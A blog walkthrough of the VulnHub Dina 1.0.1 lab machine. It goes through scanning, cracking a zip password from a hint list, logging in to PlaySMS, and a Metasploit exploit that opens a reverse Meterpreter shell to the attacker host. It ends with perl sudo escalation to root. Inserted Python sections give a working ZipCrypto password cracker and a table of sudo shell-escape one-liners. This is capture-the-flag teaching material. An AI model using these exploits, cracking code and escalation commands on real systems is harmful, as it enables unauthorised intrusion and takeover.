Saturday, November 16, 2019

VulnHub: Dina 1.0.1 Walkthrough

We start off with an nmap scan against the remote host (service/version detection, default scripts and OS fingerprinting).
root@ubuntu:~/Downloads# nmap -sC -sV -O -T5 192.168.56.101

Starting Nmap 7.60 ( https://nmap.org ) at 2019-11-14 19:44 MST
Nmap scan report for vtcsec (192.168.56.101)
Host is up (0.00043s latency).
Not shown: 993 closed ports
PORT      STATE    SERVICE      VERSION
80/tcp    open     http         Apache httpd 2.2.22 ((Ubuntu))
| http-robots.txt: 5 disallowed entries 
|_/ange1 /angel1 /nothing /tmp /uploads
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Dina
MAC Address: 08:00:27:3A:EC:D6 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.5
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.58 seconds
root@ubuntu:~/Downloads# 
Nmap came back with only port 80 open, and the site's robots.txt gives us some directories to browse:
User-agent: *
Disallow: /ange1
Disallow: /angel1
Disallow: /nothing
Disallow: /tmp
Disallow: /uploads
Most of the directories are empty, but 'nothing' contains a 404 error message. If we view the source of that page we find a hint: view-source:http://192.168.56.101/nothing/
#my secret pass
freedom
password
helloworld!
diana
iloveroot
We have a list of passwords we can use later. Next we run nikto against the host to see if it finds anything of interest.
root@ubuntu:~/src/nikto/program# ./nikto.pl -host 192.168.56.101
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.101
+ Target Hostname:    192.168.56.101
+ Target Port:        80
+ Start Time:         2019-11-14 19:49:10 (GMT-7)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Server may leak inodes via ETags, header found with file /, inode: 425463, size: 3618, mtime: Tue Oct 17 07:46:52 2017
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-3268: /ange1/: Directory indexing found.
+ Entry '/ange1/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /angel1/: Directory indexing found.
+ Entry '/angel1/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /tmp/: Directory indexing found.
+ Entry '/tmp/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /uploads/: Directory indexing found.
+ Entry '/uploads/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 5 entries which should be manually viewed.
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.39). Apache 2.2.34 is the EOL for the 2.x branch.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ OSVDB-3268: /secure/: Directory indexing found.
+ OSVDB-3092: /tmp/: This might be interesting.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8761 requests: 0 error(s) and 21 item(s) reported on remote host
+ End Time:           2019-11-14 19:49:26 (GMT-7) (16 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@ubuntu:~/src/nikto/program# 
Nikto came back with an interesting directory, 'secure'. If we browse to it we find a zip file, backup.zip: http://192.168.56.101/secure/
If we download the archive and try to open it we see that it is password protected. We have the list of passwords from the hint, so we try each of those against the zip file; 'freedom' from that list opens it. We now extract the mp3 file and do a little forensics.
root@ubuntu:~/Downloads# file backup-cred.mp3 
backup-cred.mp3: ASCII text
root@ubuntu:~/Downloads# 
root@ubuntu:~/Downloads# strings backup-cred.mp3 
I am not toooo smart in computer .......dat the resoan i always choose easy password...with creds backup file....
uname: touhid
password: ******
url : /SecreTSMSgatwayLogin
root@ubuntu:~/Downloads# 
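As an added example (not code from the original post), here is the zip password step done in Python rather than by trying each word by hand. It reimplements the traditional ZipCrypto key schedule from the ZIP specification so the attack runs offline against a constructed fixture (a stand-in for backup-cred.mp3 sealed with 'freedom'), shows the 12-byte header check that makes every wrong guess nearly free, and adds a `crack_zip` helper that runs the same wordlist against a real archive through the standard library's `zipfile`. The hint list is the one from /nothing/; treating its first line as a comment, and all function names here, are my own choices.

```python
import os
import zipfile
import zlib

# CRC-32 table for ZipCrypto's key update (same polynomial zlib uses).
_CRCTAB = []
for _i in range(256):
    _c = _i
    for _ in range(8):
        _c = (0xEDB88320 ^ (_c >> 1)) if _c & 1 else (_c >> 1)
    _CRCTAB.append(_c)

def _crc32_update(crc, byte):
    return _CRCTAB[(crc ^ byte) & 0xFF] ^ (crc >> 8)

class ZipCryptoKeys:
    """The three 32-bit key registers ZipCrypto derives from the password."""
    def __init__(self, password):
        self.k0, self.k1, self.k2 = 0x12345678, 0x23456789, 0x34567890
        for b in password:
            self.update(b)

    def update(self, plain_byte):
        self.k0 = _crc32_update(self.k0, plain_byte)
        self.k1 = ((self.k1 + (self.k0 & 0xFF)) * 134775813 + 1) & 0xFFFFFFFF
        self.k2 = _crc32_update(self.k2, self.k1 >> 24)

    def stream_byte(self):
        t = (self.k2 | 2) & 0xFFFF
        return ((t * (t ^ 1)) >> 8) & 0xFF

    def decrypt(self, data):
        out = bytearray()
        for c in data:
            p = c ^ self.stream_byte()
            self.update(p)  # keys advance on the plaintext byte
            out.append(p)
        return bytes(out)

    def encrypt(self, data):
        out = bytearray()
        for p in data:
            out.append(p ^ self.stream_byte())
            self.update(p)
        return bytes(out)

def encrypt_member(password, plaintext, salt=None):
    """12-byte encryption header + encrypted stored body. The header's last byte
    is the high byte of the plaintext CRC, which every reader checks first."""
    crc = zlib.crc32(plaintext) & 0xFFFFFFFF
    salt = os.urandom(11) if salt is None else salt
    return ZipCryptoKeys(password).encrypt(salt + bytes([crc >> 24]) + plaintext)

def quick_check(password, blob, crc):
    """Header-only test: true for the real password, and for ~1/256 wrong ones."""
    return ZipCryptoKeys(password).decrypt(blob[:12])[11] == crc >> 24

def full_check(password, blob, crc):
    """Decrypt everything and verify the CRC of the recovered plaintext."""
    return (zlib.crc32(ZipCryptoKeys(password).decrypt(blob)[12:]) & 0xFFFFFFFF) == crc

def words(candidates):
    """Skip blanks and '#' comment lines (assumption: the hint file's first line is one)."""
    for line in candidates:
        w = line.strip()
        if w and not w.startswith("#"):
            yield w

def crack(candidates, blob, crc):
    """First candidate that survives both checks, or None."""
    for w in words(candidates):
        pw = w.encode()
        if quick_check(pw, blob, crc) and full_check(pw, blob, crc):
            return w
    return None

def crack_zip(path, candidates):
    """Same attack on a real archive via the stdlib: zipfile raises RuntimeError
    on a failed check byte and BadZipFile on a CRC mismatch."""
    with zipfile.ZipFile(path) as zf:
        member = next(i for i in zf.infolist() if not i.is_dir())
        if not member.flag_bits & 0x1:
            raise ValueError("%s is not encrypted; any password would 'work'" % member.filename)
        for w in words(candidates):
            try:
                zf.read(member, pwd=w.encode())
                return w
            except (RuntimeError, zipfile.BadZipFile):
                continue
    return None

# Constructed fixture: a stand-in for backup-cred.mp3 sealed with the password
# the walkthrough recovered; HINTS is the list from /nothing/.
HINTS = ["#my secret pass", "freedom", "password", "helloworld!", "diana", "iloveroot"]
PLAINTEXT = b"uname: touhid\nurl : /SecreTSMSgatwayLogin\n"
PLAIN_CRC = zlib.crc32(PLAINTEXT) & 0xFFFFFFFF
BLOB = encrypt_member(b"freedom", PLAINTEXT, salt=bytes(11))

def demo():
    return crack(HINTS, BLOB, PLAIN_CRC)
```

Against the real archive, `crack_zip("backup.zip", open("hints.txt"))` (file name assumed) does what the manual attempts did. The header check is why a six-word list against ZipCrypto is instantaneous, and its 1-in-256 false-positive rate is why a real tool always confirms a hit with a full CRC check, as `crack` does.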
The mp3 file is not an mp3 file at all but a text file (file already identifies it as ASCII text, so cat would have done as well as strings). The message gives us a username and a URL to visit: http://192.168.56.101/SecreTSMSgatwayLogin/index.php?app=main&inc=core_auth&route=login
We have a login screen here, where we will try the username touhid with each of the passwords from the list.
username: touhid
#my secret pass
freedom
password
helloworld!
diana
iloveroot
http://192.168.56.101/SecreTSMSgatwayLogin/index.php?app=main&inc=core_welcome
The login succeeds for touhid with the password diana, landing us on the core_welcome page. The application is PlaySMS, so we go on to search for exploits for it.
root@ubuntu:~/src/exploitdb# ./searchsploit playsms
------------------------------------------------------------------------------------------------------------- -------------------------------------------
 Exploit Title                                                                                               |  Path
                                                                                                             | (/home/sam/src/exploitdb/)
------------------------------------------------------------------------------------------------------------- -------------------------------------------
PlaySMS - 'import.php' (Authenticated) CSV File Upload Code Execution (Metasploit)                           | exploits/php/remote/44598.rb
PlaySMS 1.4 - '/sendfromfile.php' Remote Code Execution / Unrestricted File Upload                           | exploits/php/webapps/42003.txt
PlaySMS 1.4 - 'import.php' Remote Code Execution                                                             | exploits/php/webapps/42044.txt
PlaySMS 1.4 - 'sendfromfile.php?Filename' (Authenticated) 'Code Execution (Metasploit)                       | exploits/php/remote/44599.rb
PlaySMS 1.4 - Remote Code Execution                                                                          | exploits/php/webapps/42038.txt
PlaySms 0.7 - SQL Injection                                                                                  | exploits/linux/remote/404.pl
PlaySms 0.8 - 'index.php' Cross-Site Scripting                                                               | exploits/php/webapps/26871.txt
PlaySms 0.9.3 - Multiple Local/Remote File Inclusions                                                        | exploits/php/webapps/7687.txt
PlaySms 0.9.5.2 - Remote File Inclusion                                                                      | exploits/php/webapps/17792.txt
PlaySms 0.9.9.2 - Cross-Site Request Forgery                                                                 | exploits/php/webapps/30177.txt
------------------------------------------------------------------------------------------------------------- -------------------------------------------
Shellcodes: No Result
root@ubuntu:~/src/exploitdb# 
We have a few choices, but there is a Metasploit module, which is what we will use to get code execution and then a shell. Let's fire up Metasploit and try it out.
msf5 > search playsms

Matching Modules
================

   #  Name                                       Disclosure Date  Rank       Check  Description
   -  ----                                       ---------------  ----       -----  -----------
   0  exploit/multi/http/playsms_filename_exec   2017-05-21       excellent  Yes    PlaySMS sendfromfile.php Authenticated "Filename" Field Code Execution
   1  exploit/multi/http/playsms_uploadcsv_exec  2017-05-21       excellent  Yes    PlaySMS import.php Authenticated CSV File Upload Code Execution


msf5 > use exploit/multi/http/playsms_filename_exec
msf5 exploit(multi/http/playsms_filename_exec) > show info

       Name: PlaySMS sendfromfile.php Authenticated "Filename" Field Code Execution
     Module: exploit/multi/http/playsms_filename_exec
   Platform: PHP
       Arch: php
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2017-05-21

Provided by:
  Touhid M.Shaikh 
  DarkS3curity

Available targets:
  Id  Name
  --  ----
  0   PlaySMS 1.4

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  PASSWORD   admin            yes       Password to authenticate with
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
  RPORT      80               yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       Base playsms directory path
  USERNAME   admin            yes       Username to authenticate with
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits a code injection vulnerability within an 
  authenticated file upload feature in PlaySMS v1.4. This issue is 
  caused by improper file name handling in sendfromfile.php file. 
  Authenticated Users can upload a file and rename the file with a 
  malicious payload. This module was tested against PlaySMS 1.4 on 
  VulnHub's Dina 1.0 machine and Windows 7.

References:
  https://www.exploit-db.com/exploits/42003
  https://cvedetails.com/cve/CVE-2017-9080/
  https://www.youtube.com/watch?v=MuYoImvfpew
  http://touhidshaikh.com/blog/?p=336

msf5 exploit(multi/http/playsms_filename_exec) > set USERNAME touhid
USERNAME => touhid
msf5 exploit(multi/http/playsms_filename_exec) > set PASSWORD diana
PASSWORD => diana
msf5 exploit(multi/http/playsms_filename_exec) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf5 exploit(multi/http/playsms_filename_exec) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf5 exploit(multi/http/playsms_filename_exec) > set TARGETURI /SecreTSMSgatwayLogin
TARGETURI => /SecreTSMSgatwayLogin
msf5 exploit(multi/http/playsms_filename_exec) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[+] Authentication successful : [ touhid : diana ]
[*] Sending stage (38288 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:40206) at 2019-11-16 13:19:18 -0700

meterpreter > shell
Process 3741 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
whoami
www-data
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@Dina:/var/www/SecreTSMSgatwayLogin$
We got a shell after running the Metasploit module and upgraded it to a proper tty with python's pty. Let's now enumerate the system to find a way to elevate our privileges.
www-data@Dina:/var/www/SecreTSMSgatwayLogin$ find / -xdev -perm -4000 -type f 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/pt_chown
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/bin/sudoedit
/usr/bin/lppasswd
/usr/bin/traceroute6.iputils
/usr/bin/newgrp
/usr/bin/at
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/mtr
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/arping
/usr/bin/X
/usr/bin/chfn
/usr/sbin/pppd
/usr/sbin/uuidd
/bin/ping6
/bin/umount
/bin/mount
/bin/ping
/bin/su
/bin/fusermount
www-data@Dina:/var/www/SecreTSMSgatwayLogin$
The find for SUID binaries didn't come back with anything beyond the standard set, so let's try sudo -l.
www-data@Dina:/var/www/SecreTSMSgatwayLogin$ sudo -l 
sudo -l
Matching Defaults entries for www-data on this host:
    env_reset,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on this host:
    (ALL) NOPASSWD: /usr/bin/perl
www-data@Dina:/var/www/SecreTSMSgatwayLogin$ 
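Added example, not from the original post: a small Python triage of the two listings above. It compares the SUID set against a baseline (here the walkthrough's own output, which is all stock Ubuntu 12.04 binaries; that nothing in it is interesting is the assumption) and parses the `sudo -l` rules to flag commands that hand out a shell, producing the same perl one-liner the walkthrough uses. The sample inputs are the listings above, with one constructed extra SUID path to show what a hit looks like.

```python
import re

# Baseline SUID set: the walkthrough's `find / -xdev -perm -4000 -type f` listing,
# i.e. the stock Ubuntu 12.04 set (assumption: anything outside it deserves a look).
STOCK_SUID = frozenset("""
/usr/lib/openssh/ssh-keysign /usr/lib/pt_chown /usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1 /usr/lib/eject/dmcrypt-get-device
/usr/bin/sudoedit /usr/bin/lppasswd /usr/bin/traceroute6.iputils /usr/bin/newgrp
/usr/bin/at /usr/bin/pkexec /usr/bin/sudo /usr/bin/mtr /usr/bin/passwd /usr/bin/gpasswd
/usr/bin/chsh /usr/bin/arping /usr/bin/X /usr/bin/chfn /usr/sbin/pppd /usr/sbin/uuidd
/bin/ping6 /bin/umount /bin/mount /bin/ping /bin/su /bin/fusermount
""".split())

# A SUID file under these prefixes is suspicious even if its name looks familiar.
ODD_SUID_DIRS = ("/usr/local/", "/opt/", "/home/", "/tmp/", "/var/", "/srv/")

# Commands that give a shell when sudo runs them as root. The perl one-liner is
# the one the walkthrough uses; the others are the usual equivalents.
SHELL_ESCAPES = {
    "perl": "perl -e 'exec(\"/bin/sh -i\");'",
    "python": "python -c 'import os; os.system(\"/bin/sh\")'",
    "ruby": "ruby -e 'exec \"/bin/sh\"'",
    "awk": "awk 'BEGIN {system(\"/bin/sh\")}'",
    "find": "find / -exec /bin/sh \\; -quit",
    "vim": "vim -c ':!/bin/sh'",
    "bash": "bash",
    "sh": "sh",
}

def unexpected_suid(find_output, baseline=STOCK_SUID):
    """Paths from a raw `find -perm -4000` listing that are not in the baseline
    or that live somewhere a SUID file has no business being."""
    hits = []
    for path in find_output.split():
        if not path.startswith("/"):
            continue  # ignore stray tokens; feed this the listing, not the prompt line
        if path not in baseline or path.startswith(ODD_SUID_DIRS):
            hits.append(path)
    return hits

_RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>\S.*)$")

def parse_sudo_l(output):
    """(runas, tags, command) for each rule line in `sudo -l` output."""
    rules, in_rules = [], False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        m = _RULE.match(line) if in_rules else None
        if not m:
            continue
        tags = [t for t in re.split(r":\s*", m.group("tags")) if t]
        for cmd in m.group("cmds").split(","):
            rules.append((m.group("runas").strip(), tags, cmd.strip()))
    return rules

def escalation_paths(sudo_output):
    """Sudo rules that hand out a shell, with the command that gets it."""
    hits = []
    for runas, tags, cmd in parse_sudo_l(sudo_output):
        nopasswd = "NOPASSWD" in tags
        if cmd == "ALL":
            hits.append({"rule": cmd, "nopasswd": nopasswd, "run": "sudo /bin/sh"})
            continue
        parts = cmd.split()
        if len(parts) != 1:
            continue  # fixed arguments: sudo will not accept a different command line
        prog = re.sub(r"[\d.]+$", "", parts[0].rsplit("/", 1)[-1])  # python2.7 -> python
        if prog in SHELL_ESCAPES:
            hits.append({"rule": cmd, "nopasswd": nopasswd, "run": "sudo " + SHELL_ESCAPES[prog]})
    return hits

# Sample inputs: the walkthrough's own sudo -l output and SUID listing, plus one
# constructed path that is not part of a stock install.
SAMPLE_SUDO_L = r"""Matching Defaults entries for www-data on this host:
    env_reset,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on this host:
    (ALL) NOPASSWD: /usr/bin/perl
"""
SAMPLE_FIND = "\n".join(sorted(STOCK_SUID)) + "\n/usr/local/bin/backup\n"

def demo():
    return unexpected_suid(SAMPLE_FIND), escalation_paths(SAMPLE_SUDO_L)
```

Run the real listings through `unexpected_suid` and `escalation_paths` on the box; on Dina the first returns nothing and the second returns the perl rule with `nopasswd` set, which is exactly the result worked by hand here.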
The user www-data can run perl via sudo without a password. Since perl can exec an arbitrary program, a simple one-liner breaks us out into a root shell:
www-data@Dina:/var/www/SecreTSMSgatwayLogin$ sudo perl -e 'exec("/bin/sh -i");'
sudo perl -e 'exec("/bin/sh -i");'
# id
id
uid=0(root) gid=0(root) groups=0(root)
# whoami
whoami
root
# 
Now that we have root, all that is left to do is cat flag.txt.
# cd /root
cd /root
# ls -la
ls -la
total 52
drwx------  6 root root 4096 Oct 17  2017 .
drwxr-xr-x 23 root root 4096 Oct 17  2017 ..
-rw-------  1 root root 2466 Oct 17  2017 .bash_history
-rw-r--r--  1 root root 3106 Apr 19  2012 .bashrc
drwxr-xr-x  3 root root 4096 Oct 17  2017 .cache
drwxr-xr-x  3 root root 4096 Oct 17  2017 .config
drwxr-xr-x  3 root root 4096 Oct 17  2017 .local
-rw-------  1 root root   55 Oct 17  2017 .mysql_history
-rw-------  1 root root    9 Oct 17  2017 .nano_history
-rw-r--r--  1 root root  140 Apr 19  2012 .profile
drwx------  2 root root 4096 Nov 15 08:13 .pulse
-rw-------  1 root root  256 Oct 17  2017 .pulse-cookie
-rw-r--r--  1 root root  639 Oct 17  2017 flag.txt
# cat flag.txt
cat flag.txt
________                                                _________
\________\--------___       ___         ____----------/_________/
    \_______\----\\\\\\   //_ _ \\    //////-------/________/
        \______\----\\|| (( ~|~ )))  ||//------/________/
            \_____\---\\ ((\ = / ))) //----/_____/
                 \____\--\_)))  \ _)))---/____/
                       \__/  (((     (((_/
                          |  -)))  -  ))


root password is : hello@3210
easy one .....but hard to guess.....
but i think u dont need root password......
u already have root shelll....


CONGO.........
FLAG : 22d06624cd604a0626eb5a2992a6f2e6



# 
